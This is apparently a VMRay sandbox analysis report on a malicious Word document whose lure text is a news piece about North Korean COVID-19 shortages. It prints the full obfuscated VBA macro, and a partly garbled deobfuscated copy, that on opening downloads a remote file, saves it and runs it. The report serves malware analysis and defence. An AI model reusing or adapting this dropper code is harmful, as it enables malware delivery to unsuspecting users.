Try VMRay Platform
Malicious
Classifications

-

Threat Names

Mal/Generic-S Mal/HTMLGen-A

Dynamic Analysis Report

Created on 2025-03-24T11:25:10+00:00

70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665.docx.doc

Word Document
...

Remarks (1/1)

(0x0200005B): Activate Microsoft Office to ensure correct sample execution.

Filters:
File Name Category Type Verdict Actions
C:\Users\kEecfMwgj\Desktop\70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665.docx.doc Sample File Word Document
Malicious
...
»
MIME Type application/msword
File Size 52.00 KB
MD5 90a59c16d670fd77d710516299533834 Copy to Clipboard
SHA1 25c0a651d7bdfdfca2f37160837829bea669c5f7 Copy to Clipboard
SHA256 70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665 Copy to Clipboard
SSDeep 384:Mo8AY64U4jOHgiI/6iSY5UFXoOfYxFSAtcwqVCM+V0hxtjiK6yOrX0jui3M:t/7dRc6lCMvxp6yOL5i Copy to Clipboard
ImpHash -
Static Analysis Parser Error DocMetaProperty value is invalid
File Reputation Information
»
Verdict
Malicious
Names Mal/Generic-S
Office Information
»
Creator SNOOPY
Last Modified By user
Revision 5
Create Time 2020-11-26 23:28 (UTC+1)
Modify Time 2020-11-26 23:37 (UTC+1)
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 14.0
Template Normal.dotm
Company Microsoft
Document Security NONE
Editing Time 120.0
Page Count 3
Line Count 28
Paragraph Count 8
Word Count 599
Character Count 3417
Chars With Spaces 4008
Title 1
scale_crop False
shared_doc False
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
VBA Macros (1)
»
Macro #1: ThisDocument
»
Deobfuscated Code 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
    Dim euelis As Object
    Dim itelro As String
    Set euelis = CreateObject("WScript.Shell")
    itelro = euelis.SpecialFolders("Templates")
    Dim ccc
    Dim eee
    ActiveDocument.Range.Font.Color = wdColorBlack
    Set 0 = CreateObject("microsoft.xmlhttp")
    Set 0 = CreateObject("Shell.Application")
    eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))
    zzz = Chr(733824 / CLng(7056)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))
    yyy = Chr(214015 / CLng(1861)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))
    0.Open "get", zzz + yyy, False
    0.send
    ccc = 0.responseBody
    If 0.Status = 200 Then
        Set 0 = CreateObject("adodb.stream")
        0.Open
        bbb.Type = 1
        0.Write ccc
        0.SaveToFile eee, 2
        0.Close
    End If
    0.Open eee
End Sub

Original Code 
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()



  Dim euelis As Object
    Dim itelro As String

    Set euelis = CreateObject("WScript.Shell")
    itelro = euelis.SpecialFolders("Templates")
Dim bbb
Dim ccc
Dim ddd
Dim eee
Dim fff
Dim ggg As Integer
Dim hhh
Dim iii
ggg = 1


ActiveDocument.Range.Font.Color = wdColorBlack

Set hhh = CreateObject("microsoft.xmlhttp")
Dim dfefef
dfefef = Chr(88395 / &H429) + Chr(-6659 + &H1A6B) & Chr(-5652 + &H1679) & Chr(111348 / &H407) & Chr(-2738 + &HB1E) & Chr(136114 / &HB8F) & Chr(195715 / &HBC3) & Chr(1097488 / &H2647) & Chr(-2672 + &HAE0) & Chr(175932 / &H65D) & Chr(430710 / &H1006) & Chr(705672 / &H1BD8) & Chr(-6236 + &H18BD) & Chr(215876 / &H745) & Chr(84840 / &H328) & Chr(1005438 / &H2362) & Chr(863830 / &H1EAD)
Set fff = CreateObject(dfefef)
eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))

zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))

yyy = Chr(214015 / CLng(&H745)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))

hhh.Open "get", zzz + yyy, False
hhh.send
ccc = hhh.responseBody
If hhh.Status = 200 Then
Set bbb = CreateObject("adodb.stream")
bbb.Open
bbb.Type = ggg
bbb.Write ccc
bbb.SaveToFile eee, ggg + ggg
bbb.Close
End If
fff.Open (eee)
End Sub
Document Content Snippet
» 
Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia
Amid an ongoing, full-scale border lockdown against COVID-19, North Korea on Tuesday warned its citizens against relying on imported foreign goods  calling the habit a dangerous disease that could spread the virus from abroad.
Pyongyangs warning against bringing in foreign goods is not just empty words, either: On Monday, sources toldVOAthat supermarkets and shops in Pyongyang have lacked foreign-sourced staples for months, including coffee, cocoa and chocolate. This appears to be out of paranoia that foreign goods could carry traces of COVID-19  which is possible, HYPERLINK "https://www.un.org/en/coronavirus/covid-19-faqs" according to the United Nations, though not the most common way the virus has been transmitted worldwide.
Sources also toldVOAthat theres currently no evidence that food items are coming across the border from China, with only locally produced items available on Pyongyang store shelves.
INT
CFB Streams (15)
»
Name ID Size Actions
Root\Data 1 4.00 KB
...
Root\Table 2 7.17 KB
...
Root\WordDocument 3 9.04 KB
...
Root\SummaryInformation 4 4.00 KB
...
Root\DocumentSummaryInformation 5 4.00 KB
...
Root\Macros\VBA\dir 8 515 Bytes
...
Root\Macros\VBA\__SRP_0 9 1.67 KB
...
Root\Macros\VBA\__SRP_1 10 102 Bytes
...
Root\Macros\VBA\__SRP_2 11 3.91 KB
...
Root\Macros\VBA\__SRP_3 12 103 Bytes
...
Root\Macros\VBA\ThisDocument 13 8.17 KB
...
Root\Macros\VBA\_VBA_PROJECT 14 2.73 KB
...
Root\Macros\PROJECT 15 375 Bytes
...
Root\Macros\PROJECTwm 16 41 Bytes
...
Root\CompObj 17 114 Bytes
...
Extracted URLs (5)
»
URL WHOIS Data Reputation Status Recursively Submitted Actions
https://www.nknews.org/2020/10/north-korea-urges-people-indoors-fearing-dust-from-china-will-spread-covid-19/?t=1604306607548
Show WHOIS
Not Available
-
...
https://www.nknews.org/2020/08/kaesong-lockdown-lifted-at-north-korean-politburo-meeting-led-by-kim-jong-un/?t=1603769778434
Show WHOIS
Not Available
-
...
https://www.un.org/en/coronavirus/covid-19-faqs
Show WHOIS
Not Available
-
...
https://www.nknews.org/pro/full-text-north-koreas-decree-to-shoot-people-illegally-approaching-border/?t=1603703245483
Show WHOIS
Not Available
-
...
https://www.nknews.org/2020/08/unicef-says-north-korea-decided-to-temporarily-close-nampho-port-late-july/?t=1604306607548
Show WHOIS
Not Available
-
...
VMRay - Analyzer - www.vmray.com
Legal Note - Privacy Policy
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting \"security.fileuri.strict_origin_policy\".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    

     Exit-Icon
    

    

     

      WHOIS Domain Information
     

     

      

       
        Domain Name
       
       
       
      

      

       
        WHOIS Response
       
       
        

       		
      

     

    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image